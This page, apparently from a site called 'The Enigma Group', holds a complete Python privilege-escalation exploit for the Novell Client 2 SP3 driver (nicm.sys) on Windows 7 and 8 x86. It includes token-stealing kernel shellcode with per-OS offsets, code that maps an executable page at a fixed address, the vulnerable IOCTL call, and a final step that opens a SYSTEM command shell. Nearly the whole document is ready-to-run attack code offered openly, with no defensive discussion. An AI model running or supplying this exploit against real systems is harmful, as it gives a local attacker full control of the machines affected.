The Enigma Group

Novell Client 2 SP3 - Privilege Escalation Exploit


# Novell Client 2 SP3 Privilege escalation exploit

# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0

# Thanks to Master Ryujin :)



# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure weather there was anything else public)

# Exploit for DEMO purposes :)

# Does not bypass SMEP on Windows 8

# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/



from ctypes import *

import sys,struct,os

from optparse import OptionParser



kernel32 = windll.kernel32

ntdll    = windll.ntdll



if __name__ == '__main__':



     usage =  "%prog -o <target>"

     parser = OptionParser(usage=usage)

     parser.add_option("-o", type="string",

                  action="store", dest="target_os",

                  help="Available target operating systems: WIN7, WIN8")

     (options, args) = parser.parse_args()

     OS = options.target_os

     if not OS or OS.upper() not in ['WIN7','WIN8']:

           parser.print_help()

           sys.exit()

     OS = OS.upper()



     if OS == "WIN7":

        _KPROCESS = "\x50" # Offset for Win7

        _TOKEN    = "\xf8" # Offset for Win7

        _UPID     = "\xb4" # Offset for Win7

        _APLINKS  = "\xb8" # Offset for Win7

        

        steal_token =  "\x52"                                 +\

                 "\x53"                                 +\

                 "\x33\xc0"                             +\

                 "\x64\x8b\x80\x24\x01\x00\x00"         +\

                 "\x8b\x40" + _KPROCESS                 +\

                 "\x8b\xc8"                             +\

                 "\x8b\x98" + _TOKEN + "\x00\x00\x00"   +\

                 "\x89\x1d\x00\x09\x02\x00"             +\

                 "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\

                 "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\

                 "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\

                 "\x75\xe8"                             +\

                 "\x8b\x90" + _TOKEN + "\x00\x00\x00"   +\

                 "\x8b\xc1"                             +\

                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\

                 "\x5b"                                 +\

                 "\x5a"                                 +\

                 "\xc2\x08"



        sc = steal_token    

        

     else: 

        _KPROCESS = "\x80" # Offset for Win8

        _TOKEN    = "\xEC" # Offset for Win8

        _UPID     = "\xB4" # Offset for Win8

        _APLINKS  = "\xB8" # Offset for Win8



        steal_token =  "\x52"                                 +\

                 "\x53"                                 +\

                 "\x33\xc0"                             +\

                 "\x64\x8b\x80\x24\x01\x00\x00"         +\

                 "\x8b\x80" + _KPROCESS + "\x00\x00\x00"+\

                 "\x8b\xc8"                             +\

                 "\x8b\x98" + _TOKEN + "\x00\x00\x00"   +\

                 "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\

                 "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\

                 "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\

                 "\x75\xe8"                             +\

                 "\x8b\x90" + _TOKEN + "\x00\x00\x00"   +\

                 "\x8b\xc1"                             +\

                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\

                 "\x5b"                                 +\

                 "\x5a"                                 +\

                 "\xc2\x08"



        sc = steal_token



    

     kernel_sc = "\x14\x00\x0d\x0d"

     kernel_sc+= "\x41\x41\x41\x41"

     kernel_sc+= "\x41\x41\x41\x41"

     kernel_sc+= "\x41\x41\x41\x41"

     kernel_sc+= "\x41\x41\x41\x41"

     kernel_sc+= "\x18\x00\x0d\x0d"

     kernel_sc+= "\x41\x41\x41\x41"

     kernel_sc+= "\x41\x41\x41\x41"

     kernel_sc+= "\x41\x41\x41\x41"

     kernel_sc+= "\x28\x00\x0d\x0d"

     kernel_sc+= sc

    

    

     print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."

     print "[>] Finding the driver."

    

     GENERIC_READ = 0x80000000

     GENERIC_WRITE = 0x40000000

     OPEN_EXISTING = 0x3

     DEVICE = '\\\\.\\nicm'

    

     device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)

     EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL

     retn = c_ulong()

    

     inut_buffer = 0x0d0d0000

     inut_size = 0x14

     output_buffer = 0x0

     output_size = 0x0



     baseadd    = c_int(0x0d0d0000)

        

     MEMRES     = (0x1000 | 0x2000)

     PAGEEXE    = 0x00000040

     Zero_Bits   = c_int(0)

     RegionSize = c_int(0x1000)

     write    = c_int(0)



     print "[>] Allocating memory for our shellcode."

     dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)

     print "[>] Writing the shellcode."

     kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write))



     if device_handler:

        print "[>] Sending IOCTL to the driver."

        dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)



     print "[>] Dropping to a SYSTEM shell."

     os.system("cmd.exe /K cd C:\\windows\\system32")